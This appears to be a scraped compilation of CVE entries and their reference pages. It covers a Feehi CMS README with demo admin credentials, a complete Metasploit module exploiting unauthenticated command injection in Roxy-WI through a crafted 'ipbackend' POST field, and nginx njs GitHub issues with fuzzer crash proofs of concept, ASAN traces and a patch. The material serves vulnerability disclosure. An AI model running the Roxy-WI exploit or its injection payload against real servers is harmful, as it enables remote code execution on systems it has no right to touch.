In zulip before 1.3.12, bot API keys were accessible to other users in the same realm.

CVE-2016-4426: Version History — Zulip 2.1.7 documentation

A stored cross-site scripting (XSS) vulnerability in /index.php?r=site%2Fsignup of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username field.

**FeehiCMS **(English)** 首款编写单元测试、功能测试、验收测试的yii2开源系统**

基于yii2的CMS系统，运行环境与yii2(php>=5.4)一致。FeehiCMS旨在为yii2爱好者提供一个基础功能稳定完善的系统，使开发者更专注于业务功能开发。 FeehiCMS没有对yii2做任何的修改、封装，但是把yii2的一些优秀特性几乎都用在了FeehiCMS上，虽提供文档， 但FeehiCMS提倡简洁、快速上手，基于FeehiCMS开发可以无需文档，反倒FeehiCMS为yii2文档提供了最好的实例

  

**演示站点**

演示站点后台 **用户名:feehicms 密码123456**

*   后台 http://demo.cms.feehi.com/admin
*   前台 http://demo.cms.feehi.com
*   api http://demo.cms.feehi.com/api/articles

**更新记录****帮助**

1.  开发文档http://doc.feehi.com
    
2.  QQ群 936448696
    
3.  微信  
    
4.  Email job@feehi.com
    
5.  bug反馈
    

**功能**

*   多语言
*   单元测试
*   功能测试
*   验收测试
*   RBAC权限管理
*   restful api
*   文章管理
*   操作日志
*   适配手机

FeehiCMS提供完备的web系统基础通用功能，包括前后台菜单管理,文章标签,广告,banner,缓存,网站设置,seo设置,邮件设置,分类管理,单页...

**使用Docker**

1.下载镜像

    $ docker pull registry.cn-hangzhou.aliyuncs.com/feehi/cms #FQ后建议直接使用docker pull feehi/cms

2.创建容器

    $ docker run --name feehicms -h feehicms -itd -v /path/to/data:/data -e DBDSN=sqlite:/data/feehi.db -e TablePrefix=feehi\_ -e AdminUsername=admin -e AdminPassword=123456 -p 8080:80 feehi/cms

以上命令将会自动初始化FeehiCMS，并导入数据库(默认数据库为sqlite)  
如果需要更使用其他数据库，比如mysql，执行:

    $ docker run --name feehicms -h feehicms -itd -e DBDSN=mysql:host=mysql-ip;dbname=feehi -e DBUser=dbuser -e DBPassword=dbpassword -e TablePrefix=feehi\_ -e AdminUsername=admin -e AdminPassword=123456 -p 8080:80 feehi/cms

如果需要使用postgresql则将DBDSN改为pgsql:host=pgsql-ip

也可以仅初始化FeehiCMS，然后通过web在线安装

    $ docker run --name feehicms -h feehicms -itd -p 8080:80 feehi/cms -o start

然后访问http://ip:port/install.php，根据提示选择数据库类型，填写数据库用户名、数据库密码、后台管理员用户名、密码完成安装。

以上方式启动的容器只能用作开发环境，容器启动命令最终调用为php -S 0.0.0.0:80,如果用作production，可以执行

    $ docker run --name feehicms -h feehicms -itd -p 8080:80 feehi/cms -m start

容器将启动php-fpm，并监听9000端口，配合nginx使用。nginx配置大致为

    location ~ \\.php$ {
        ...
        fastcgi\_pass fpm-ip:9000;
        fastcgi\_param  SCRIPT\_FILENAME  /usr/local/feehicms/frontend/web$fastcgi\_script\_name;
        ...
    }

**因为yii2会生成js/css，以及新上传的文件（图片）需要nginx webroot使用php fpm容器同一个文件夹:/usr/local/feehicms/frontend/web**

**安装**

前置条件: 如未特别说明，本文档已默认您把php命令加入了环境变量，如果您未把php加入环境变量，请把以下命令中的php替换成/path/to/php

> 无论是使用归档文件还是composer，都有相应阶段让您填入后台管理用户名、密码

1.  使用归档文件(简单，适合没有yii2经验者)
    
    1.  下载FeehiCMS源码 点击此处下载最新版
    2.  解压到目录
    3.  配置web服务器web服务器配置
    4.  浏览器打开 http://localhost/install.php 按照提示完成安装(若使用php内置web服务a器则地址为 http://localhost:8080/install.php )
    5.  完成
2.  使用composer (推荐使用此方式安装)
    
    > composer的安装以及国内镜像设置请点击 此处
    
    > 以下命令默认您已全局安装composer，如果您是局部安装的composer:请使用php /path/to/composer.phar来替换以下命令中的composer
    
    1.  使用composer创建FeehiCMS项目
        
            $ composer create-project feehi/cms webApp //此命令创建的FeehiCMS项目不能平滑升级新版本(目录结构简单,目前主力维护版本)
        
    2.  依次执行以下命令初始化yii2框架以及导入数据库
        
        $ cd webApp
        $ php ./init --env=Development #初始化yii2框架，线上环境请使用--env=Production
        $ php ./yii migrate/up --interactive=0 #导入FeehiCMS sql数据库，执行此步骤之前请先到common/config/main-local.php修改成正确的数据库配置
        
    3.  配置web服务器web服务器配置
        
    4.  完成
        

**运行测试**

1.  仅运行单元测试,功能测试(不需要配置web服务器)

   cd /path/to/webApp
   vendor/bin/codecept run

2.  运行单元测试,功能测试,验收测试(需要配置完web服务器)
    1.  分别拷贝backend,frontend,api三个目录下的tests/acceptance.suite.yml.example到各自目录，并均重名为acceptance.suite.yml,且均修改里面的url为各自的访问url地址
    2.  与上(仅运行单元测试,功能测试)命令一致

**项目展示**

*   山东城市服务技师学院
*   优悦娱乐网
*   吉安市食品药品监督管理局
*   完美娱乐
*   房产网
*   中丞法拍网
*   51前途网
*   用友财务软件
*   ......

**运行效果**

CVE-2022-34140: GitHub - liufee/cms: Feehi CMS based on yii2

This Metasploit module exploits an unauthenticated command injection vulnerability in Roxy-WI versions prior to 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in Roxy-WI          prior to version 6.1.1.0. Successful exploitation results in remote code execution          under the context of the web server user.          Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.        },        'License' => MSF_LICENSE,        'Author' => [          'Nuri Çilengir <nuri[at]prodaft.com>', # Author & Metasploit module        ],        'References' => [          ['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory          ['URL', 'https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532'], # Additional Information          ['URL', 'https://github.com/hap-wi/roxy-wi/commit/82666df1e60c45dd6aa533b01a392f015d32f755'], # Patch          ['CVE', '2022-31137']        ],        'DefaultOptions' => {          'SSL' => true,          'WfsDelay' => 25        },        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Unix (In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :in_memory            }          ],          [            'Linux (Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :dropper            }          ]        ],        'CmdStagerFlavor' => ['printf'],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2022-07-06',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(443),        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])      ]    )  end  def execute_command(cmd, _opts = {})    return send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'app', 'options.py'),        'vars_post' => {          'serv' => '127.0.0.1',          'ipbackend' => "\"; #{cmd} ;#",          'alert_consumer' => Rex::Text.rand_text_alpha_lower(7),          'backend_server' => '127.0.0.1'        }      }, 10    )  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT    return nil  end  def check    print_status("Checking if #{peer} is vulnerable!")    res = execute_command('id')    return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res    if res.code == 200 && res.body =~ /uid=\d+$.+$/      print_status("#{peer} is vulnerable!")      return CheckCode::Vulnerable('The device responded to exploitation with a 200 OK and test command successfully executed.')    elsif res.code == 200      return CheckCode::Unknown('The target did respond 200 OK response however it did not contain the expected payload.')    else      return CheckCode::Safe("The #{peer} did not respond a 200 OK response and the expected response, meaning its not vulnerable.")    end  end  def exploit    print_status('Exploiting...')    case target['Type']    when :in_memory      execute_command(payload.encoded)    when :dropper      execute_cmdstager    end  endend

Roxy-WI Remote Command Execution

Nginx NJS v0.7.5 was discovered to contain a segmentation violation in the function njs_value_own_enumerate at src/njs_value.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

Jun 1, 2022

· 0 comments

**Comments**

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 9159992D-C762-4DEB-8981-8A3357935A7A
    function placeholder(){}
    function main() {
    var v2 = [];
    var v4 = {"get":Number};
    var v6 = Object.defineProperty(v2,29425,v4);
    var v7 = AggregateError(v6);
    Object.e = v7;
    var v9 = Promise();
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==8116==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004eed5c bp 0x7ffcc19b6310 sp 0x7ffcc19b61e0 T0)
    ==8116==The signal is caused by a READ memory access.
    ==8116==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4eed5c in njs_value_own_enumerate /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:240:21
        #1 0x53a37f in njs_object_traverse /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_object.c:1230:23
        #2 0x5a16ed in njs_builtin_match_native_function /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_builtin.c:776:11
        #3 0x592ad4 in njs_add_backtrace_entry /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:1308:15
        #4 0x592ad4 in njs_error_stack_new /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:102:16
        #5 0x592ad4 in njs_error_stack_attach /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_error.c:161:11
        #6 0x50506e in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1007:16
        #7 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #8 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #9 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #10 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #11 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #12 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #13 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #14 0x7f0a16923082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #15 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:240:21 in njs_value_own_enumerate
    ==8116==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

2 participants

CVE-2022-34032: SEGV src/njs_value.c:240:21 in njs_value_own_enumerate · Issue #524 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_value_to_number at src/njs_value_conversion.h.

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 74595E5A-F4AD-43DB-A4E9-34F2D366AD8A
    function placeholder(){}
    function main() {
    var v0 = /gL8?/;
    var v1 = {};
    var v2 = [v1,v1,v0];
    function v4(v5) {
        v2[1866532165] = undefined;
    }
    function v6(v7,v8) {
        function v10(v11) {
            v11[-4294967297] = Map;
        }
        var v13 = new Uint16Array(v2);
    }
    v1.valueOf = v4;
    var v15 = typeof Map;
    var v17 = typeof Map;
    var v19 = new Promise(v6);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==7855==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x00000063545b bp 0x7ffeac888710 sp 0x7ffeac8884e0 T0)
    ==7855==The signal is caused by a READ memory access.
    ==7855==Hint: address points to the zero page.
        #0 0x63545b in njs_value_to_number /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9
        #1 0x63545b in njs_typed_array_alloc /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:171:19
        #2 0x63a56b in njs_typed_array_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:229:13
        #3 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #4 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #5 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #6 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #7 0x573b65 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #8 0x573b65 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
        #9 0x648ed3 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
        #10 0x648ed3 in njs_promise_constructor_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:214:11
        #11 0x648ed3 in njs_promise_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:164:15
        #12 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #13 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #14 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #15 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #16 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #17 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #22 0x7f8daaa33082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9 in njs_value_to_number
    ==7855==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34031: SEGV src/njs_value_conversion.h:17:9 in njs_value_to_number · Issue #523 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_djb_hash at src/njs_djb_hash.c.

Environment

Commit  : c756e23eb09dac519fe161c88587cc034306630f (high:1882)
Version : 0.7.5
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

    // Minimizing 8AC3654E-F5A1-405C-B380-951904AD058C
    function placeholder(){}
    function main() {
    var v1 = Function;
    var v6 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185];
    var v8 = [v6,1050462187];
    var v11 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185];
    var v13 = [v11,1050462187];
    var v15 = v11.__proto__;
    function v16(v17,v18,v19,...v20) {
        var v21 = [v17,-1000000000000.0];
        function v22(v23,v24,v25,...v26) {
            var v27 = {"d":v22};
            var v28 = Object.defineProperty(v15,v18,v27);
        }
        var v30 = v21["find"](v22);
    }
    var v32 = v13["find"](v16);
    var v34 = v6.__proto__;
    function v35(v36,v37,v38,...v39) {
        'use strict';
        var v40 = [v36,-1000000000000.0];
        var v42 = 471270.459031428 in v39;
        var v43 = 1000.0;
        var v45 = String.fromCodePoint();
        var v46 = -128;
        var v50 = `YVySS90U8G${v45}string${-452883207}-2${Uint8Array}dotAll`.indexOf();
        var v51 = 50691;
        var v52 = 658545.3967616097;
        var v53 = undefined;
        var v54 = -1.7976931348623157e+308;
        var v55 = 2147483647;
        var v56 = 4184750072;
        var v57 = "toString";
        var v58 = Float64Array;
        var v59 = "a";
        var v60 = 54444;
        var v61 = ["c14RHVOudV",1050462187];
        function v62(v63,v64,v65,...v66) {
            var v68 = v34["shift"]();
        }
        var v70 = v61["find"](v62);
        function v71(v72,v73,v74,...v75) {
            'use strict';
            var v76 = {"get":v71};
            var v77 = Object.defineProperty(v34,35017,v76);
        }
        var v79 = v40["find"](v71);
    }
    var v81 = v8["find"](v35);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==2802==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004e312b bp 0x7ffca2668c70 sp 0x7ffca2668c40 T0)
    ==2802==The signal is caused by a READ memory access.
    ==2802==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4e312b in njs_djb_hash /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16
        #1 0x4f10cb in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:618:32
        #2 0x502d6a in njs_vmcode_property_in /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1431:11
        #3 0x502d6a in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:492:23
        #4 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #5 0x573a55 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16
        #6 0x573a55 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
        #7 0x560b05 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
        #8 0x560b05 in njs_array_iterator_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:1918:12
        #9 0x560b05 in njs_array_handler_find /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2025:11
        #10 0x65b9ea in njs_object_iterate /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_iterator.c
        #11 0x554e0f in njs_array_prototype_iterator /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2297:11
        #12 0x57599e in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:739:11
        #13 0x573d0c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:777:16
        #14 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #15 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #16 0x573d3f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16
        #17 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #22 0x7f1db1e4a082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16 in njs_djb_hash
    ==2802==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34030: SEGV src/njs_djb_hash.c:21:16 in njs_djb_hash · Issue #540 · nginx/njs

Nginx NJS v0.7.4 was discovered to contain an out-of-bounds read via njs_scope_value at njs_scope.h.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

May 30, 2022

· 2 comments

Assignees

**Comments**

Environment

Commit  : 9f4ebc96148308a8ce12f2b54432c87e6d78b881
Version : 0.7.4
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

// Minimizing 34F6ED23-C193-452B-B724-E62BD7E15360
function placeholder(){}
function main() {
function v0(v1,v2,v3,v4,...v5) {
    try {
        async function v7(v8,v9,v10,v11) {
            var v12 \= await Proxy;
        }
        var v13 \= v0();
    } catch(v14) {
    } finally {
    }
    var v15 \= {};
    var v16 \= /gL8?/;
    var v17 \= {};
    var v18 \= \[v15,v17,v16\];
    function v20(v21) {
        v18\[1866532165\] \= Map;
    }
    async function v24(v25,v26) {
        var v27 \= await Map;
    }
    function v28(v29,v30) {
    }
    var v32 \= new Promise(v28);
    var v34 \= v32\["catch"\]();
    var v37 \= {"get":Promise,"set":v24};
    var v38 \= Object.defineProperty(v34,"constructor",v37);
    async function v39(v40,v41) {
        var v42 \= await v38;
    }
    var v43 \= v39();
    var v44 \= v20(Map);
}
var v45 \= v0();
}
main();

Minified

function run\_then() {}

function f(n) {
    if (n \== 2) {
        return;
    }

    try {
        f(n + 1);
    } catch(e) {
    }

    var p \= new Promise(run\_then);
    Object.defineProperty(p, "constructor", {get: () \=> ({}).a.a});
    async function g() {
        await p;
    }

    g();

    throw 'QQ';
}

f(0);

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==815==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000040 (pc 0x0000004ff20b bp 0x7ffc7abf6030 sp 0x7ffc7abf5880 T0)
    ==815==The signal is caused by a READ memory access.
    ==815==Hint: address points to the zero page.
        #0 0x4ff20b in njs_scope_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12
        #1 0x4ff20b in njs_scope_valid_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:84:13
        #2 0x4ff20b in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:155:13
        #3 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #4 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #5 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #6 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #7 0x7f8dc7694082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #8 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12 in njs_scope_value
    ==815==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

 dramthy changed the title SEGV njs\_scope.h:74:12 Heap-based Buffer Overflow in njs\_scope\_value SEGV njs\_scope.h:74:12 Out-of-bounds Read in njs\_scope\_value

May 30, 2022

Copy link

Contributor

** **xeioex** commented Jun 2, 2022**

The patch

# HG changeset patch
# Parent  d63163569c25cb90fe654f0fedefde43553f833a
Fixed njs\_vmcode\_interpreter() when await fails.

Previously, while interpreting a user function, njs\_vmcode\_interpreter()
might return prematurely when an error happens in await instruction.
This is not correct because the current frame has to be unwound (or
exception caught) first.

The fix is exit through only 5 appropriate exit points to ensure
proper unwinding.

The patch correctly fixes issue reported in 07ef6c1f04f1 (0.7.3).

This closes #506 issue on Github.

diff --git a/src/njs\_vmcode.c b/src/njs\_vmcode.c
\--- a/src/njs\_vmcode.c
+++ b/src/njs\_vmcode.c
@@ -858,7 +858,12 @@ next:
 
                 njs\_vmcode\_debug(vm, pc, "EXIT AWAIT");
 
\-                return njs\_vmcode\_await(vm, await, promise\_cap, async\_ctx);
+                ret = njs\_vmcode\_await(vm, await, promise\_cap, async\_ctx);
+                if (njs\_slow\_path(ret == NJS\_ERROR)) {
+                    goto error;
+                }
+
+                return ret;
 
             case NJS\_VMCODE\_TRY\_START:
                 ret = njs\_vmcode\_try\_start(vm, value1, value2, pc);
@@ -1923,6 +1928,7 @@ njs\_vmcode\_await(njs\_vm\_t \*vm, njs\_vmcod
 
     value = njs\_scope\_valid\_value(vm, await->retval);
     if (njs\_slow\_path(value == NULL)) {
+        njs\_internal\_error(vm, "await->retval is invalid");
         return NJS\_ERROR;
     }
 

Yes, I check the patch is valid for #506,#508,#509,#510,#511,#512,#513,#514,#515,#516,#518,#519,#520,#521,#525,#526,#527,#528. @xeioex

2 participants

CVE-2022-34029: SEGV njs_scope.h:74:12 Out-of-bounds Read in njs_scope_value · Issue #506 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h.

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 811225C4-281E-48F6-8D83-E65B5DB8E211
    function placeholder(){}
    function main() {
    var v0 = "WbgAtnLEGv";
    var v2 = [10000,10000,10000,10000,10000];
    var v3 = 0.0;
    var v4 = undefined;
    var v6 = v2.includes();
    var v7 = 1;
    var v10 = NaN;
    var v11 = 3269;
    var v12 = "toUpperCase";
    var v14 = String["fromCharCode"](String,1156435285,String,3269);
    var v17 = `symbol${String}undefined${v14}number${v14}byteOffset${1156435285}e`["replace"](1156435285,v14);
    var v19 = Uint8ClampedArray.from(v17);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==9418==ERROR: AddressSanitizer: SEGV on unknown address 0x62505a68846a (pc 0x000000516e19 bp 0x7ffc9f96e8f0 sp 0x7ffc9f96e890 T0)
    ==9418==The signal is caused by a READ memory access.
        #0 0x516e19 in njs_utf8_next /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9
        #1 0x516e19 in njs_string_offset /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:2539:17
        #2 0x516e19 in njs_string_slice_string_prop /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1512:21
        #3 0x5176bf in njs_string_slice /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1544:5
        #4 0x4f35dd in njs_string_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:910:16
        #5 0x4f189b in njs_object_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:693:27
        #6 0x4f189b in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:622:15
        #7 0x4ef9fe in njs_value_property /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:1058:11
        #8 0x63b787 in njs_value_property_i64 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.h:1087:12
        #9 0x63b787 in njs_typed_array_from /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:407:15
        #10 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
